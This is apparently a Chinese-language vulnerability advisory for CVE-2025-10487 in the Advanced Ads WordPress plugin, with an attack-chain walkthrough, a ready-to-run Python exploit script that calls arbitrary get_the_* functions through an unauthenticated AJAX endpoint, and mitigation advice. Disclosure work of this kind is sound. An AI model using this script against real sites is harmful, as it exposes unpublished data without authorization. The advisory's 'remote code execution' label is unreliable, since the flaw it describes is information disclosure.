CVE-2025-10487 WordPress Advanced Ads插件远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-10487

漏洞类型

远程代码执行

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Advanced Ads – Ad Manager & AdSense WordPress插件

漏洞概述

CVE-2025-10487是WordPress平台Advanced Ads广告管理插件中的一个高危安全漏洞。该插件是WordPress生态中流行的广告管理和AdSense集成解决方案，被广泛应用于各类网站以实现广告投放和管理功能。漏洞存在于插件的AJAX端点处理机制中，具体为select_one()函数存在严重的访问控制缺陷。由于该AJAX端点未正确限制访问权限，且未对可调用的函数进行安全过滤，攻击者可以在无需任何认证的情况下调用任意以get_the_开头的WordPress核心函数。这种设计缺陷使得未经身份验证的远程攻击者能够利用此漏洞执行信息泄露攻击，获取网站敏感信息。该漏洞的CVSS评分为7.3，属于高危级别，对使用该插件的WordPress网站构成严重安全威胁。攻击者可通过发送特制的HTTP请求到目标网站的AJAX端点，无需任何前置条件即可触发漏洞利用过程。

技术细节

该漏洞的核心问题在于Advanced Ads插件的AJAX端点实现存在访问控制缺陷和技术逻辑错误。具体表现为以下几个方面：

1. 端点访问控制缺失：插件的AJAX处理函数使用了WordPress的wp_ajax_nopriv_钩子，这意味着该端点允许未认证用户访问，而未实施任何身份验证或权限检查机制。

2. 函数调用过滤不足：在select_one()函数的实现中，程序直接接受用户输入的函数名参数，并尝试调用该函数。缺乏对可调用函数的严格白名单限制，导致攻击者可以调用WordPress核心的任意get_the_*系列函数。

3. 攻击利用方式：攻击者通过构造包含恶意函数名的AJAX请求（如action=advads_ad_select_one&func=get_the_excerpt），利用插件对用户输入的不当处理，触发敏感函数执行。这些函数可能返回数据库中的草稿内容、待发布文章信息或其他未公开的敏感数据。

4. 影响范围评估：所有使用Advanced Ads插件2.0.12及之前版本的WordPress网站均受影响。由于该插件安装量较大，且漏洞利用无需认证，潜在风险极高。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Advanced Ads插件，确认插件版本是否在受影响范围内（<=2.0.12）

STEP 2

步骤2: 探测端点

攻击者定位目标网站的AJAX端点wp-admin/admin-ajax.php，并验证advads_ad_select_one操作是否可用

STEP 3

步骤3: 构造恶意请求

攻击者构造包含action参数为advads_ad_select_one且func参数为目标WordPress函数（如get_the_excerpt）的HTTP POST请求

STEP 4

步骤4: 发送漏洞利用请求

攻击者从未认证状态发送特制的AJAX请求到目标服务器，绕过所有身份验证机制

STEP 5

步骤5: 触发函数执行

服务器端插件接收到请求后，由于缺乏函数调用过滤，直接调用用户指定的get_the_*函数

STEP 6

步骤6: 信息泄露

被调用的WordPress核心函数返回敏感数据（如未发布文章的摘要、数据库内容等），攻击者获取这些信息用于进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-10487 PoC - Advanced Ads Plugin Unauthorized Function Call
# Target: WordPress site with Advanced Ads plugin <= 2.0.12

def exploit_cve_2025_10487(target_url, func_name='get_the_excerpt'):
    """
    Exploit for CVE-2025-10487: Advanced Ads Plugin Remote Code execution
    via unauthorized AJAX endpoint function call.
    
    Args:
        target_url: Base URL of the WordPress site
        func_name: WordPress function to call (default: get_the_excerpt)
    
    Returns:
        Response content from the exploited endpoint
    """
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    payload = {
        'action': 'advads_ad_select_one',
        'func': func_name
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Exploiting endpoint: {endpoint}")
        print(f"[*] Calling function: {func_name}")
        
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)} bytes")
        
        if response.status_code == 200:
            print("[+] Exploit executed successfully!")
            print(f"[+] Response:\n{response.text[:500]}")
            return response.text
        else:
            print("[-] Exploit failed - check target or plugin version")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10487.py <target_url> [function_name]")
        print("Example: python cve-2025-10487.py https://example.com get_the_excerpt")
        sys.exit(1)
    
    target = sys.argv[1]
    func = sys.argv[2] if len(sys.argv) > 2 else 'get_the_excerpt'
    
    exploit_cve_2025_10487(target, func)

影响范围

Advanced Ads WordPress插件 <= 2.0.12

防御指南

临时缓解措施

在无法立即升级插件的情况下，可采取以下临时缓解措施：首先，通过.htaccess或Nginx配置阻止未授权用户访问wp-admin/admin-ajax.php端点中与Advanced Ads相关的操作；其次，使用WordPress安全插件（如Wordfence）添加临时防火墙规则来阻止CVE-2025-10487的利用尝试；最后，考虑使用网站防火墙服务添加额外的安全层。同时建议在可行的情况下暂时禁用Advanced Ads插件，直到完成安全更新。